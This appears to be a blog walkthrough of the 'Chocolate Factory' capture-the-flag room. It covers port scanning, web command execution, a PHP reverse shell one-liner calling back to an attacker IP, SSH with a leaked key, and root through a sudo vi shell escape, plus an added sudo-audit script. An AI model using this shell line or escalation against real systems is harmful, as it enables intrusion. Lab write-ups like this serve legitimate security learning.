In this post, I would like to share a walkthrough of the Chocolate Factory Room.


This room is rated as a LOW difficulty machine.


Let’s Start!


We need to deploy the machine before we can work with it.


Once the machine is fully up (within 5 minutes), we can start information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN

Information Gathering on Chocolate Factory


Multiple ports are open, but the crucial ports that caught my attention are:

  • 21: vsftpd 3.0.2
  • 22: OpenSSH 7.6p1
  • 80: Apache httpd 2.6.29

Let’s check what is stored inside the website.


Let’s start to enumerate the website by executing the command dirb <IP Address> /usr/share/wordlist/common.txt -X .php,.html, and hope that we find something useful.


We did find something useful: home.php.


The page shows an input field where you can key in any command, and an EXECUTE button.


Let’s try a command that works on Linux.


The command below is uname -a


Let’s see what is stored on the server. Oh wow! I notice the key_rev_key file.


Let’s try to download the file by accessing the location in the browser as shown below


Sadly, it’s hard to read the file, but I notice the key appears in the middle of the code.


It’s very hard for us to run commands via the browser. Let’s upload a shell so that we can access the machine from the terminal.


The shell that we can use in this situation is as follows:

php -r '$sock=fsockopen("ip-address",port);exec("/bin/sh -i <&3 >&3 2>&3");'
* Replace ip-address and port with your own IP address and port

For this activity, I use 1234 as my port


Let’s read the user.txt file in the /home/charlie directory


However, we cannot read the file because permission is denied. Let’s see what is written in the teleport file by running cat teleport


We need to copy everything in the teleport file and paste it into a new id_rsa file on our machine.


We can then get access via ssh by running the command below


ssh charlie@<IP Address> -i id_rsa

SSH Access to the machine


Now we can read user.txt using charlie’s credentials


Got it! Now we need to focus on gaining root privileges


Let’s run the command sudo -l


I notice that /usr/bin/vi can be used to gain root privileges.


Inside vi, we can execute :!/bin/sh and press Enter. We have successfully gained root access.
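
From the defending side, the sudo -l finding above is something an administrator can check for before anyone else does. The script below is an added example, not part of the original walkthrough: it reads sudo -l output and flags entries for programs with a built-in shell escape such as vi. The program list, the function names and the sample output are constructed assumptions.

```shell
#!/bin/sh
# Short, non-exhaustive list of programs with a built-in shell escape
# (assumption for this example; extend it for your own hosts).
ESCAPABLE="vi vim view less more man"

# Constructed sample of `sudo -l` output (not taken from the room).
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for charlie on host:
    env_reset, mail_badpass

User charlie may run the following commands on host:
    (root) NOPASSWD: /usr/bin/vi
    (root) NOEXEC: /usr/bin/less /var/log/syslog
    (root) /usr/bin/systemctl status apache2, /usr/bin/vim
EOF
}

# Reads `sudo -l` output on stdin and prints one line per risky command:
#   RISK <path>       the program can spawn a shell as the target user
#   MITIGATED <path>  same program, but the rule carries the NOEXEC tag
# Simplification: a tag is treated as applying to the whole rule line.
audit_sudo_l() {
    awk -v risky="$ESCAPABLE" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    /^[ \t]*\(.*\)/ {                            # rule lines start with "(runas)"
        noexec = ($0 ~ /NOEXEC:/)
        sub(/^[ \t]*\([^)]*\)[ \t]*/, "")        # drop "(runas)"
        gsub(/[A-Z_]+:[ \t]*/, "")               # drop tags such as NOPASSWD:
        n = split($0, cmds, /,[ \t]*/)           # one entry per allowed command
        for (i = 1; i <= n; i++) {
            split(cmds[i], w, /[ \t]+/)          # w[1] is the program path
            path = w[1]; base = path
            sub(/.*\//, "", base)                # basename, e.g. "vi"
            if (base in bad) {
                status = noexec ? "MITIGATED" : "RISK"
                print status, path
            }
        }
    }'
}

# On a real host: sudo -l -U <user> | audit_sudo_l
sample_sudo_l | audit_sudo_l
```

For file editing as root, sudoedit is the safer grant than a sudo rule for the editor binary itself.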


I didn’t find root.txt, but we found root.py in the /root/ directory


Let’s run root.py with python. The key that we need to enter is the same key as in the first question of the challenge!


While we have root privileges, let’s find charlie’s password by going to the /var/www/html directory


We need to read validate.php in order to retrieve charlie’s password

-THE END-


Happy Learning Guys!